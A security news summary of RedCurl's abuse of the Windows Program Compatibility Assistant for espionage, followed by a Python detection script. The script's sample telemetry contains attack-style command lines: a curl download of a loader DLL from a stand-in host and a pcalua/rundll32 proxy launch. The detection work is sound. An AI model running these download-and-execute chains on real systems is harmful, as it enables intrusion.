RedCurl Abuses the Windows Program Compatibility Assistant (PCA) for Espionage

Trend Micro has described a new technique used by the RedCurl group: abusing a legitimate Windows component to execute malicious commands.

The component, the Program Compatibility Assistant (PCA), was designed to resolve compatibility problems with older programs. The attackers instead use it as an alternative command-line interpreter: commands launched through this signed, built-in Windows binary are less likely to be caught by security controls that watch the usual interpreters.

The RedCurl attack chain begins with phishing emails carrying malicious attachments in ISO and IMG formats. Opening an attachment triggers a multi-stage process that uses the curl utility to fetch a loader DLL (ms.dll or ps.dll) from a remote server.

The loader DLL is then launched through PCA, and once running it connects back to the same domain from which curl downloaded it. The attackers also use Impacket to execute commands on remote hosts.
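The chain above (curl download, PCA as a launcher, a DLL that calls back to the download domain) lends itself to a simple correlation hunt over process-creation and network-connection telemetry. The following is an added example written for this page, not code from Trend Micro or from the report it summarizes. It assumes Sysmon-style fields (Image, ParentImage, CommandLine, DestinationHostname) and the fact that the PCA launcher is pcalua.exe, which runs a target program via `pcalua.exe -a <program>`; the events, hostname and file paths are constructed for illustration.

```python
import re

# Constructed sample telemetry shaped like Sysmon Event ID 1 (process create)
# and Event ID 3 (network connect) records. None of it is real data.
SAMPLE_EVENTS = [
    {"Type": "process", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -s -o C:\Users\u\AppData\Local\Temp\ms.dll http://update-check.example/ms.dll"},
    {"Type": "process", "Image": r"C:\Windows\System32\pcalua.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"pcalua.exe -a rundll32.exe C:\Users\u\AppData\Local\Temp\ms.dll,Start"},
    {"Type": "process", "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": r"rundll32.exe C:\Users\u\AppData\Local\Temp\ms.dll,Start"},
    {"Type": "network", "Image": r"C:\Windows\System32\rundll32.exe",
     "DestinationHostname": "update-check.example", "DestinationPort": 443},
    {"Type": "process", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\u\notes.txt"},
    {"Type": "network", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "www.example.org", "DestinationPort": 443},
]

URL_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)
# Path markers treated as user-writable (assumption for this example).
USER_WRITABLE = ("c:\\users\\", "\\temp\\", "c:\\programdata\\")


def image_name(path):
    """Lower-case file name of an Image/ParentImage path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def dll_arg(cmdline):
    """First .dll path on a rundll32 command line, or None."""
    m = re.search(r"([^\s\"']+\.dll)", cmdline, re.IGNORECASE)
    return m.group(1) if m else None


def download_hosts(events):
    """Hosts that curl.exe fetched from (the loader's delivery domain)."""
    hosts = set()
    for ev in events:
        if ev["Type"] == "process" and image_name(ev["Image"]) == "curl.exe":
            for m in URL_RE.finditer(ev["CommandLine"]):
                hosts.add(m.group(1).lower())
    return hosts


def detect(events):
    """Return (rule, event_index) findings for the RedCurl-style chain."""
    findings = []
    hosts = download_hosts(events)
    for i, ev in enumerate(events):
        name = image_name(ev["Image"])
        if ev["Type"] == "process":
            cmd = ev["CommandLine"]
            parent = image_name(ev.get("ParentImage", ""))
            # PCA as a proxy launcher: `pcalua.exe -a <program>` runs <program>
            # under the compatibility assistant; also flag its child processes.
            if (name == "pcalua.exe" and re.search(r"(^|\s)-a(\s|$)", cmd)) or parent == "pcalua.exe":
                findings.append(("pca_proxy_execution", i))
            if name == "curl.exe" and URL_RE.search(cmd):
                findings.append(("curl_remote_download", i))
            if name == "rundll32.exe":
                dll = dll_arg(cmd)
                if dll and is_user_writable(dll):
                    findings.append(("rundll32_user_writable_dll", i))
        elif ev["Type"] == "network":
            # A non-curl process talking to the delivery domain: the loader
            # reaching back to the same host curl fetched it from.
            if name != "curl.exe" and ev["DestinationHostname"].lower() in hosts:
                findings.append(("c2_matches_download_host", i))
    return findings


if __name__ == "__main__":
    for rule, idx in detect(SAMPLE_EVENTS):
        print(f"{rule:28} event[{idx}] {SAMPLE_EVENTS[idx]['Image']}")
```

Each rule on its own is noisy in a large estate (curl.exe ships with Windows and rundll32 is used legitimately); the value is in the correlation, so in production the findings would be grouped by host and session before alerting, and the download-host set would be built from a time window rather than the whole event stream.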

The RedCurl group, active since 2018 and first identified in 2019, specializes in corporate espionage. It uses custom tools to steal business correspondence, employees' personal data, and legal documents.

Researchers at F.A.C.C.T. recently uncovered a new RedCurl campaign targeting organizations in Australia, Singapore, and Hong Kong. The attacks affected the construction, logistics, air transport, and mining sectors.
